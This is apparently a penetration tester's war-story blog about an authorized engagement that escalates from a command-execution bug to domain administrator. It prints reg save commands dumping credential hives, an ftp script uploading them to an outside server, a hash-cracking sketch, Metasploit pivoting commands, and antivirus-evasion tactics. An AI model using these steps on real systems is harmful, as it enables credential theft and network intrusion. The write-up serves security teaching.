Day 1: It started off as any other day in LABS. Test this, exploit that, research this, etc. I was combing through the systems and services available to me on an external PenTest when I found a server with an odd but, ultimately, mouth-watering vulnerability. The vulnerable server would allow me to execute single commands one at a time and receive the output of each. I thought to myself, “This is it, game over.” What I didn’t know was that the following days would be a constant back and forth between myself and the incident response team on the other side of the firewall. I fired up Metasploit and immediately went for the kill: turning this single command execution into a full-blown shell. I set up all the necessary parameters and launched the exploit, expecting a “Sending stage…” output shortly thereafter, but it never came. No shell. “Hmm…,” I thought to myself. Maybe it was a fluke. So I re-launched the exploit and waited in anticipation, only to sigh that heavy, disappointed sigh we see all too often. Was it the firewall? Anti-Virus? What was derailing my success? This was going to have to be a manual job. So I poured myself another cup of Karl’s exotic coffee and strapped in for the long day ahead.
My initial thought was that the firewall had to be keeping my reverse shell from getting out of their environment. So, leveraging the command execution vulnerability, I started testing outbound internet access from the vulnerable server to my server on the internet, only to find that the port I had been using all along in the initial Metasploit attempt was allowed out. This left me with a sense of disappointed optimism: the firewall wasn’t blocking it, but for some reason it wasn’t working. “Maybe it’s getting caught by Anti-Virus,” I thought. I used the command execution to generate and execute an FTP script that would download a payload from my server. The logs on my server showed an active download from the target company’s network. “…Excellent…,” I mischievously muttered to myself in my best Mr. Burns impression. I returned to the vulnerable server expecting to execute my payload, catch the shell, and claim my victory. However, my payload was nowhere to be found. Maybe it was a fluke (anyone else starting to see a pattern here?). I re-launched the FTP script, watched the logs, but again my payload was AWOL. Maybe a change in direction would help. Again using the command execution, I saved off copies of the registry hives, created another FTP script to upload them to my server, executed it, and monitored the logs for active connections. The transfer completed and I returned to my server to find three new files had been uploaded. Success! I had managed to leverage a chink in the armor to save a copy of the running registry hives and upload them to my server. That was a great proof of concept, but I wanted more. This was just a way to sanity-check myself. What I didn’t realize at the time, however, was how crucial a role those three files would play in the demise of my victim.
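For the curious, the hive-grab-and-upload step can be sketched roughly like this, using Windows’ built-in reg.exe and the scripted ftp client. The server address, credentials, and filenames here are illustrative assumptions, not details from the engagement:

```
C:\> reg save HKLM\SAM sam.save
C:\> reg save HKLM\SECURITY security.save
C:\> reg save HKLM\SYSTEM system.save
C:\> ftp -s:script.txt
```

where a hypothetical script.txt fed to `ftp -s:` might contain:

```
open 203.0.113.10
anonymous
anon@example.com
binary
put sam.save
put security.save
put system.save
bye
```

The SECURITY and SYSTEM hives together are what make cached domain credentials recoverable later; SAM holds local account hashes.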
At this point the only logical conclusion I could come up with was that the Anti-Virus was catching my payload and eradicating it from the system. Child’s play. I tried encoding the payload in a few other formats with no immediate success. Then, like a bag of bricks to the face, it hit me. VBScript. Whose anti-virus detects VBScript? I encoded my payload in VBS, re-created the FTP script, and executed it. I returned to the vulnerable server, and there it was: karlscoffee.vbs. I set up my listener, executed the payload, and reveled in my success as my shell was received from inside the target network. I did a bit of enumeration on the system as well as the network, but found this to be a logical stopping point for the day. What a huge mistake this turned out to be.
Day 2: After getting settled in, Karl’s coffee in hand, I anxiously resumed testing for the day using the same attack path as before, only to find the vulnerable webserver was no longer responding to my requests. Time for a sanity check. Google? Reddit? All accessible. Vulnerable webserver? It’s like it never happened. The server was just… gone. I finally reached out to the point of contact to determine if I had caused some sort of outage:
ME: “Hi [POC], I just wanted to check on the status of a server I was testing against yesterday. It appears to not be responding today and I wanted to let you know in case this was something I inadvertently caused due to testing.”
POC: Oh? What server was it?
ME: [Server A]
POC: (shuffles through some papers) Ah yes, [Server A]. My security department let me know yesterday there was a critical vulnerability with it and we decommissioned it right away. It’s gone.
It seemed my chink in the armor had been completely removed from the network. Several desperate hours of searching for another way in left me completely empty-handed. Well, not completely empty-handed. I did have those registry hive files. Wait… those registry hives. I could pull cached password hashes of any user that had logged into that server from those registry hives! So I extracted the cached domain credentials from the hives, and there it was: the domain administrator password hash for their secondary domain, amongst other accounts. My eyes lit up with a renewed sense of excitement. I quickly ran the hash through a password cracker and waited anxiously to see if it would crack. After what felt like an eternity, the results were in: it had been cracked! Now to find a way in.
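Why are those cached hashes crackable at all? Windows stores domain cached credentials (DCC2, a.k.a. “mscash2”) as a salted, iterated hash of the password, so anyone holding the SECURITY and SYSTEM hives can mount an offline dictionary attack against them. Here is a minimal sketch of that attack loop in Python — note it uses PBKDF2-HMAC-SHA1 directly over the password for illustration only, not the exact DCC2 derivation (which first folds in an MD4 of the password), and the username, password, and wordlist are all made up:

```python
import hashlib

# Real DCC2 uses 10240 rounds of PBKDF2-HMAC-SHA1, salted with the
# lowercased username; we mirror those parameters here.
ITERATIONS = 10240

def cache_hash(password: str, username: str) -> bytes:
    """Illustrative salted, iterated hash (not the exact DCC2 format)."""
    return hashlib.pbkdf2_hmac(
        "sha1",
        password.encode("utf-16-le"),
        username.lower().encode("utf-16-le"),
        ITERATIONS,
        dklen=16,
    )

def crack(target: bytes, username: str, wordlist):
    """Try each candidate password until one reproduces the stolen hash."""
    for candidate in wordlist:
        if cache_hash(candidate, username) == target:
            return candidate
    return None

# Hypothetical stolen hash for a hypothetical "Administrator" account:
stolen = cache_hash("Winter2013!", "Administrator")
print(crack(stolen, "Administrator", ["password", "letmein", "Winter2013!"]))
```

The per-guess PBKDF2 work factor slows the attack down, but a weak or reused domain administrator password still falls to a decent wordlist.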
I distinctly remembered coming across a Citrix server at some point during the test, but thought to myself, “Surely the domain administrator account doesn’t have any Citrix access, right? Surely the password has been changed since the last time the account was logged into on that server… RIGHT?” Wrong. I tracked down the Citrix server, logged in as the domain administrator, and lo and behold, not only did the account have access, but it also had access to every application published in Citrix, including a command prompt for the Citrix server. I launched the command prompt and rejoiced in my newfound foothold into the target environment. A bit of command line kung-fu later, I had a full desktop environment on the company’s Citrix server. This was a great baseline, but I wanted more.
I needed to pivot further into the environment, and for that I would need a meterpreter shell to proxy all of my traffic. “No problem,” I thought. I’ll just download another payload from my server. So I launched Internet Explorer and attempted to download my payload again, but much to my surprise, the Anti-Virus software caught it. Incident Response had recovered my VBS payload from the first server and created a signature for it. Fortunately, I was able to determine which files and folders the company had excluded from AV scanning and figured I could just download my payload there. So I returned to IE and attempted to save the payload to an AV-safe directory, only to find that Incident Response had blocked the ability to transfer files through a web browser! I suddenly found myself in a live-fire engagement with Incident Response. “Shall we play a game?” (WarGames, 1983). Touché blue team, touché. A bit of Citrix-fu, however, allowed me to copy the payload over directly through a drive-mapping feature which mapped my local drive as a network drive on the Citrix server. I executed the payload, received my meterpreter shell, and started pivoting my way deeper and deeper into the target network, lurking in the dark and staying off of Incident Response’s radar. After coming this far, the last thing I needed was for them to find me and terminate my presence.
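The pivoting setup hinted at here typically looks something like the following Metasploit session. The module names are standard Metasploit; the subnet and port are illustrative assumptions, not values from the engagement:

```
meterpreter > run autoroute -s 10.10.10.0/24    # route the internal subnet through this session
msf > use auxiliary/server/socks4a              # stand up a SOCKS proxy on the attacker box
msf auxiliary(socks4a) > set SRVPORT 1080
msf auxiliary(socks4a) > run
```

With the route and SOCKS proxy in place, tools on the attacking machine can be pointed at the proxy (e.g., via proxychains) and reach hosts inside the target network as if they were local.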
It was only a matter of time before I had pivoted to enough systems to acquire the primary domain’s administrator password. It had been a hard-fought battle, but I had won. I gained domain administrator access to both domains and acquired a wealth of sensitive information. Bank accounts, credit cards, SSNs, W2s… all mine. I had complete control over the internal network. From Westminster. With Karl’s coffee. *Sip.